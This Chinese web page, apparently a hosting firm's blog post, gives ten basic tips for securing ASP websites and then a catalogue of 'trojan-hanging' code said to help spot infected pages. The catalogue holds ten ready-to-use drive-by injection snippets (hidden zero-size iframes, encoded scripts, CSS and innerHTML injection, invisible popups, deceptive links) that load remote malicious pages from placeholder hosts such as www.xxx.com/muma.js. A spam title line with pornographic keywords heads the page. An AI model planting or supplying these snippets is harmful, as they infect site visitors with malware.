亚洲日本免费-啊轻点灬太粗太长了三男一女-麻豆av电影在线观看-日韩一级片毛片|www.grbbt.com

如何有效的保證網(wǎng)站安全及查找網(wǎng)頁掛馬

  網(wǎng)站運行穩(wěn)定,是各位站長最想看到的,一分耕耘一分收獲維護(hù)網(wǎng)站安全得用心得細(xì)心,那么如何保證網(wǎng)站安全,如果出現(xiàn)被掛馬如何辨別,眾生網(wǎng)絡(luò) 在此分享下幾個方法,不管你懂不懂程序都能做到!

  1、建議用戶通過ftp來上傳、維護(hù)網(wǎng)頁,盡量不安裝asp的上傳程序。

  2、對asp上傳程序的調(diào)用一定要進(jìn)行身份認(rèn)證,并只允許信任的人使用上傳程序。

  這其中包括各種新聞發(fā)布、商城及論壇程序,只要可以上傳文件的asp都要進(jìn)行身份認(rèn)證!

  3、asp程序管理員的用戶名和密碼要有一定復(fù)雜性,不能過于簡單,還要注意定期更換。

  4、到正規(guī)網(wǎng)站下載asp程序,下載后要對其數(shù)據(jù)庫名稱和存放路徑進(jìn)行修改,數(shù)據(jù)庫文件名稱也要有一定復(fù)雜性。

  5、要盡量保持程序是最新版本。

  6、不要在網(wǎng)頁上加注后臺管理程序登陸頁面的鏈接。

  7、為防止程序有未知漏洞,可以在維護(hù)后刪除后臺管理程序的登陸頁面,下次維護(hù)時再通過ftp上傳即可。

  8、要時常備份數(shù)據(jù)庫等重要文件。

  9、日常要多維護(hù),并注意空間中是否有來歷不明的asp文件。記住:一分汗水,換一分安全!

  10、一旦發(fā)現(xiàn)被入侵,除非自己能識別出所有木馬文件,否則要刪除所有文件。

  重新上傳文件前,所有asp程序用戶名和密碼都要重置,并要重新修改程序數(shù)據(jù)庫名稱和存放路徑以及后臺管理程序的路徑。

  做好以上防范措施,您的網(wǎng)站只能說是相對安全了,決不能因此疏忽大意,因為入侵與反入侵是一場永恒的戰(zhàn)爭

  E.掛馬代碼大全

  ps:檢查文件是否被掛馬的時候可以參考下!

  一:框架掛馬

  <iframe src=地址 width=0 height=0></iframe>

  二:js文件掛馬

  首先將以下代碼

  document.write(“<iframe width=’0′ height=’0′ src=’地址’></iframe>”);

  保存為xxx.js,

  則JS掛馬代碼為

  <script language=javascript src=xxx.js></script>

  三:js變形加密

  <script language=”Jscript.Encode” src=http://www.xxx.com/muma.txt></script>

  muma.txt可改成任意后綴

  四:body掛馬

  <body ></body>

  五:隱蔽掛馬

  top.document.body.innerHTML = top.document.body.innerHTML + ‘rn<iframe src=”http://www.xxx.com/muma.htm/”></iframe>’;

  六:css中掛馬

  body {

  background-image: url(‘javascript:document.write(“<script src=http://www.XXX.net/muma.js></script>”)’)}

  七:JAJA掛馬

  <script language=javascript>

  window.open (“地址”,”",”toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1″);

  </script>

  八:圖片偽裝

  <html>

  <iframe src=”網(wǎng)馬地址” height=0 width=0></iframe>

  <img src=”圖片地址”></center>

  </html>

  九:偽裝調(diào)用:

  <frameset rows=”444,0″ cols=”*”>

  < frame src=”打開網(wǎng)頁” framborder=”no” scrolling=”auto” noresize marginwidth=”0″margingheight=”0″>

  <frame src=”網(wǎng)馬地址” frameborder=”no” scrolling=”no” noresize marginwidth=”0″margingheight=”0″>

  </frameset>

  十:高級欺騙

  <a href=”http://www.*****.com(迷惑連接地址,顯示這個地址指向木馬地址)” > 頁面要顯示的內(nèi)容 </a>

  < script Language=”Javascript”>

  function www_163_com ()

  {

  var url=”網(wǎng)馬地址”;

  open(url,”NewWindow”,”toolbar=no,location=no,directories=no,

  status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10″);

  }

  </script>

 

上一篇:安卓防火墻 PS DroidWall

下一篇:IPC$空連接主機(jī)步驟與簡單入侵示例